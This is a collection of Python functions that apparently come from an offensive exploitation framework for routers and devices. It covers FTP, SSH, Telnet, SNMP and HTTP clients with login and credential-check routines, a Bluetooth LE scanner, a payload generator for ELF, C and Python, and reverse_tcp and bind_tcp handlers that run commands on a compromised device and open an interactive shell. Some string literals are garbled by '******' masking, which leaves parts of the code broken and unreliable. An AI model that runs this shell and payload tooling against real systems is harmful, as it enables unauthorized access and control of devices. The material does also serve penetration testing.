def login(self, username: str, password: str) -> bool: """ Login to FTP server :param str username: FTP account username :param str password: FTP account password :return bool: True if login was successful, False otherwise """ try: self.ftp_client.login(username, password) print_success( self.peer, "FTP Authentication Successful - Username: '******' Password: '******'" .format(username, password), verbose=self.verbosity) return True except Exception: print_error( self.peer, "FTP Authentication Failed - Username: '******' Password: '******'". format(username, password), verbose=self.verbosity) self.ftp_client.close() return False
def reverse_tcp(self): all_interfaces = "0.0.0.0" sock = self.listen(all_interfaces, self.options["lport"]) if self.port_used: print_error("Could not set up listener on {}:{}".format( all_interfaces, self.options["lport"])) return # execute binary commands = self.build_commands() print_status("Executing payload on the device") # synchronized commands for command in commands[:-1]: self.exploit.execute(command) # asynchronous last command to execute binary & rm binary thread = threading.Thread(target=self.exploit.execute, args=(commands[-1], )) thread.start() # waiting for shell print_status("Waiting for reverse shell...") client, addr = sock.accept() sock.close() print_status("Connection from {}:{}".format(addr[0], addr[1])) print_success("Enjoy your shell") t = telnetlib.Telnet() t.sock = client t.interact()
def _windows_shell(self, chan: paramiko.channel.Channel) -> None: """ Start Windows shell with SSH server :param paramiko.channel.Channel chan: channel for communicating with SSH server :return None: """ def writeall(sock): while True: data = sock.recv(256) if not data: sys.stdout.flush() return sys.stdout.write(data) sys.stdout.flush() writer = threading.Thread(target=writeall, args=(chan, )) writer.start() try: while True: d = sys.stdin.read(1) if not d: break chan.send(d) except Exception as err: print_error("Error", err, verbose=self.verbosity)
def bind_tcp(self): # execute binary commands = self.build_commands() # synchronized commands for command in commands[:-1]: self.exploit.execute(command) # asynchronous last command to execute binary & rm binary thread = threading.Thread(target=self.exploit.execute, args=(commands[-1], )) thread.start() # connecting to shell print_status("Connecting to {}:{}".format(self.options['rhost'], self.options['rport'])) time.sleep(2) try: sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.connect((self.options["rhost"], int(self.options["rport"]))) except socket.error: print_error("Could not connect to {}:{}".format( self.options["rhost"], self.options["rport"])) return print_success("Enjoy your shell") tn = telnetlib.Telnet() tn.sock = sock tn.interact()
def __init__(self, udp_target: str, udp_port: int, verbosity: bool = False) -> None: """ UDP client constructor :param str udp_target: target UDP server ip address :param int udp_port: target UDP server port :param bool verbosity: display verbose output :return None: """ self.udp_target = udp_target self.udp_port = udp_port self.verbosity = verbosity self.peer = "{}:{}".format(self.udp_target, self.udp_port) if is_ipv4(self.udp_target): self.udp_client = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) elif is_ipv6(self.udp_target): self.udp_client = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM) else: print_error("Target address is not valid IPv4 nor IPv6 address", verbose=self.verbosity) return None self.udp_client.settimeout(UDP_SOCKET_TIMEOUT)
def run(self): print_status("Generating payload") try: data = self.generate() except OptionValidationError as e: print_error(e) return if self.output == "elf": with open(self.filepath, "wb+") as f: print_status("Building ELF payload") content = self.generate_elf(data) print_success("Saving file {}".format(self.filepath)) f.write(content) elif self.output == "c": print_success("Bulding payload for C") content = self.generate_c(data) print_info(content) elif self.output == "python": print_success("Building payload for python") content = self.generate_python(data) print_info(content) else: raise OptionValidationError("No such option as {}".format( self.output)) return content
def http_request(self, method: str, path: str, session: requests = requests, **kwargs) -> requests.Response: """ Requests HTTP resource :param str method: method that should be issued e.g. GET, POST :param str path: path to the resource that should be requested :param requests session: session manager that should be used :param kwargs: kwargs passed to request method :return Response: Response object """ if self.ssl: url = "https://" else: url = "http://" url += "{}:{}{}".format(self.target, self.port, path) kwargs.setdefault("timeout", HTTP_TIMEOUT) kwargs.setdefault("verify", False) kwargs.setdefault("allow_redirects", False) try: return getattr(session, method.lower())(url, **kwargs) except (requests.exceptions.MissingSchema, requests.exceptions.InvalidSchema): print_error("Invalid URL format: {}".format(url), verbose=self.verbosity) except requests.exceptions.ConnectionError: print_error("Connection error: {}".format(url), verbose=self.verbosity) except requests.RequestException as error: print_error(error, verbose=self.verbosity) except socket.error as err: print_error(err, verbose=self.verbosity) except KeyboardInterrupt: print_error("Module has been stopped", verbose=self.verbosity) return None
def send(self, data: bytes) -> bool: """ Send data to TCP server :param bytes data: data that should be sent to TCP server :return bool: True if sending data was successful, False otherwise """ try: self.tcp_client.send(data) return True except Exception as err: print_error(self.peer, "TCP Error while sending data", err, verbose=self.verbosity) return False
def close(self) -> bool: """ Close connection to TCP server :return bool: True if closing connection was successful, False otherwise """ try: self.tcp_client.close() return True except Exception as err: print_error(self.peer, "TCP Error while closing tcp socket", err, verbose=self.verbosity) return False
def login_pkey(self, username: str, priv_key: str, retries: int = 1) -> bool: """ Login to SSH server with private key :param str username: SSH account username :param str priv_key: SSH account private key :param int retries: number of login retries :return bool: True if login was successful, False otherwise """ if "DSA PRIVATE KEY" in priv_key: priv_key = paramiko.DSSKey.from_private_key(io.StringIO(priv_key)) elif "RSA PRIVATE KEY" in priv_key: priv_key = paramiko.RSAKey.from_private_key(io.StringIO(priv_key)) else: return False for _ in range(retries): try: self.ssh_client.connect(self.ssh_target, self.ssh_port, timeout=SSH_TIMEOUT, banner_timeout=SSH_TIMEOUT, username=username, pkey=priv_key, look_for_keys=False) except paramiko.AuthenticationException: print_error( self.peer, "SSH Authentication Failed - Username: '******' auth with private key" .format(username), verbose=self.verbosity) except Exception as err: print_error( self.peer, "SSH Error while authenticated by using private key", err, verbose=self.verbosity) else: print_success( self.peer, "SSH Authentication Successful - Username: '******' with private key" .format(username), verbose=self.verbosity) return True self.ssh_client.close() return False
def connect(self) -> bool: """ Connect to TCP server :return bool: True if connection was successful, False otherwise """ try: self.tcp_client.connect((self.tcp_target, self.tcp_port)) print_status(self.peer, "TCP Connection established", verbose=self.verbosity) return True except Exception as err: print_error(self.peer, "TCP Error while connecting to the server", err, verbose=self.verbosity) return False
def recv(self, num: int) -> bytes: """ Receive data from TCP server :param int num: number of bytes that should be received from the server :return bytes: data that was received from the server """ try: response = self.tcp_client.recv(num) return response except Exception as err: print_error(self.peer, "TCP Error while receiving data", err, verbose=self.verbosity) return None
def login(self, username: str, password: str, retries: int = 1) -> bool: """ Login to Telnet server :param str username: Telnet account username :param str password: Telnet account password :param int retries: number of authentication retries :return bool: True if login was successful, False otherwise """ for _ in range(retries): try: if not self.connect(): continue self.telnet_client.expect( [b"Login: "******"login: "******"Username: "******"username: "******"utf-8") + b"\r\n") self.telnet_client.expect([b"Password: "******"password: "******"utf-8") + b"\r\n") self.telnet_client.write(b"\r\n") (i, obj, res) = self.telnet_client.expect([b"Incorrect", b"incorrect"], 5) if i == -1 and any([ x in res for x in [b"#", b"$", b">"] ]) or len(res) > 500: # big banner e.g. mikrotik print_success( self.peer, "Telnet Authentication Successful - Username: '******' Password: '******'" .format(username, password), verbose=self.verbosity) return True else: print_error( self.peer, "Telnet Authentication Failed - Username: '******' Password: '******'" .format(username, password), verbose=self.verbosity) break except Exception as err: print_error(self.peer, "Telnet Error while authenticating to the server", err, verbose=self.verbosity) return False
def close(self) -> bool: """ Close UDP connection :return bool: True if connection was closed successful, False otherwise """ try: self.udp_client.close() return True except Exception as err: print_error(self.peer, "Error while closing udp socket", err, verbose=self.verbosity) return False
def close(self) -> bool: """ Close SSH connection :return bool: True if closing connection was successful, False otherwise """ try: self.ssh_client.close() return True except Exception as err: print_error(self.peer, "SSH Error while closing connection", err, verbose=self.verbosity) return False
def send(self, data: bytes) -> bool: """ Send UDP data :param bytes data: data that should be sent to the server :return bool: True if data was sent, False otherwise """ try: self.udp_client.sendto(data, (self.udp_target, self.udp_port)) return True except Exception as err: print_error(self.peer, "Error while sending data", err, verbose=self.verbosity) return False
def read_until(self, data: bytes) -> bytes: """ Read until specified data found in response :param bytes data: bytes until which data should be read :return bytes: bytes read until data """ try: response = self.telnet_client.read_until(data, 5) return response except Exception as err: print_error(self.peer, "Telnet Error while reading data from the server", err, verbose=self.verbosity) return None
def write(self, data: bytes) -> bool: """ Write data to Telnet server :param bytes data: data that should be written to Telnet server :return bool: True if data was written successfuly, False otherwise """ try: self.telnet_client.write(data, 5) return True except Exception as err: print_error(self.peer, "Telnet Error while writing to the server", err, verbose=self.verbosity) return False
def execute(self, cmd: str) -> str: """ Execute command on SSH server :param str cmd: command to execute on SSH server :return str: command output """ try: ssh_stdin, ssh_stdout, ssh_stderr = self.ssh_client.exec_command( cmd) return ssh_stdout.read() except Exception as err: print_error(self.peer, "SSH Error while executing command on the server", err, verbose=self.verbosity) return None
def connect(self) -> bool: """ Connect to Telnet server :return bool: True if connection was successful, False otherwise """ try: self.telnet_client = telnetlib.Telnet(self.telnet_target, self.telnet_port, timeout=TELNET_TIMEOUT) return True except Exception as err: print_error(self.peer, "Telnet Error while connecting to the server", err, verbose=self.verbosity) return False
def get(self, community_string: str, oid: str, version: int = 1, retries: int = 0) -> bytes: """ Get OID from SNMP server :param str community_string: SNMP server communit string :param str oid: SNMP server oid :param int version: SNMP protocol version :param int retries: number of retries :return bytes: SNMP server response """ cmdGen = cmdgen.CommandGenerator() try: errorIndication, errorStatus, errorIndex, varBinds = cmdGen.getCmd( cmdgen.CommunityData(community_string, mpModel=version), cmdgen.UdpTransportTarget((self.snmp_target, self.snmp_port), timeout=SNMP_TIMEOUT, retries=retries), oid, ) except Exception as err: print_error(self.peer, "SNMP Error while accessing server", err, verbose=self.verbosity) return None if errorIndication or errorStatus: print_error( self.peer, "SNMP invalid community string: '{}'".format(community_string), verbose=self.verbosity) else: print_success(self.peer, "SNMP valid community string found: '{}'".format( community_string), verbose=self.verbosity) return varBinds return None
def send_file(self, local_file: str, dest_file: str) -> bool: """ Send file to SSH server :param str local_file: local file that should be send to SSH server :param str dest_file: destination file that content should be saved to :return bool: True if sending file was successful, False otherwise """ try: sftp = self.ssh_client.open_sftp() sftp.put(local_file, dest_file) return True except Exception as err: print_error(self.peer, "SSH Error while sending file to the server", err, verbose=self.verbosity) return False
def enumerate_services(self): print_status("Starting enumerating {} ({} dBm) ...".format( self.addr, self.rssi)) try: dev = Peripheral(self, self.addrType) services = sorted(dev.services, key=lambda s: s.hndStart) data = [] for service in services: if service.hndStart == service.hndEnd: continue data.append([ "{:04x} -> {:04x}".format(service.hndStart, service.hndEnd), self._get_svc_description(service), "", "", ]) for _, char in enumerate(service.getCharacteristics()): desc = self._get_char_description(char) props = char.propertiesToString() hnd = char.getHandle() value = self._get_char(char, props) data.append(["{:04x}".format(hnd), desc, props, value]) dev.disconnect() return data except Exception as err: print_error(err) try: dev.disconnect() except Exception as err: print_error(err) return None
def get_content(self, remote_file: str) -> str: """ Get remote file from FTP server :param str remote_file: remote file name :return str: remote file content """ try: fp_content = io.BytesIO() self.ftp_client.retrbinary("RETR {}".format(remote_file), fp_content.write) return fp_content.getvalue() except Exception as err: print_error(self.peer, "FTP Error while retrieving content", err, verbose=self.verbosity) return None
def login(self, username: str, password: str, retries: int = 1) -> bool: """ Login to SSH server :param str username: SSH account username :param str password: SSH account password :param int retries: number of login retries :return bool: True if login was successful, False otherwise """ for _ in range(retries): try: self.ssh_client.connect(self.ssh_target, self.ssh_port, timeout=SSH_TIMEOUT, banner_timeout=SSH_TIMEOUT, username=username, password=password, look_for_keys=False) except paramiko.AuthenticationException: print_error( self.peer, "SSH Authentication Failed - Username: '******' Password: '******'" .format(username, password), verbose=self.verbosity) self.ssh_client.close() break except Exception as err: print_error(self.peer, "SSH Error while authenticating", err, verbose=self.verbosity) else: print_success( self.peer, "SSH Authentication Successful - Username: '******' Password: '******'" .format(username, password), verbose=self.verbosity) return True self.ssh_client.close() return False
def get_file(self, remote_file: str, local_file: str) -> bool: """ Get file from SSH server :param str remote_file: remote file on SSH server :param str local_file: local file that it should be saved to :return bool: True if getting file was successful, False otherwise """ try: sftp = self.ssh_client.open_sftp() sftp.get(remote_file, local_file) return True except Exception as err: print_error(self.peer, "SSH Error while retrieving file from the server", err, verbose=self.verbosity) return False
def send_content(self, content: str, dest_file: str) -> bool: """ Send file content to SSH server :param str content: data that should be sent to SSH file :param str dst_file: destination file that data should be saved to :return bool: True if sending file content was successful, False otherwise """ try: fp_content = io.BytesIO(content) sftp = self.ssh_client.open_sftp() sftp.putfo(fp_content, dest_file) return True except Exception as err: print_error(self.peer, "SSH Error while sending content to the server", err, verbose=self.verbosity) return False
def btle_scan(self, mac=None): """ Scans for Bluetooth Low Energy devices """ options = Options(self.buffering, mac, self.enum_services) scanner = BTLEScanner(options.mac).withDelegate(ScanDelegate(options)) if options.mac: print_status("Scanning BTLE device...") else: print_status("Scanning for BTLE devices...") devices = [] try: devices = [res for res in scanner.scan(self.scan_time)] except Exception as err: print_error("Error: {}".format(err)) print_error("Check if your bluetooth hardware is connected") return devices
def get_content(self, remote_file: str) -> str: """ Get file content from SSH server :param str remote_file: remote file on SSH server :return str: file content from SSH server """ try: fp_content = io.BytesIO() sftp = self.ssh_client.open_sftp() sftp.getfo(remote_file, fp_content) return fp_content.getvalue() except Exception as err: print_error( self.peer, "SSH Error while retrieving file content from the server", err, verbose=self.verbosity) return None
def test_connect(self) -> bool: """ Test connection to Telnet server :return bool: True if test connection was successful, False otherwise """ try: self.telnet_client = telnetlib.Telnet(self.telnet_target, self.telnet_port, timeout=TELNET_TIMEOUT) self.telnet_client.expect( [b"Login: "******"login: "******"Username: "******"username: "******"Telnet Error while testing connection to the server", err, verbose=self.verbosity) return False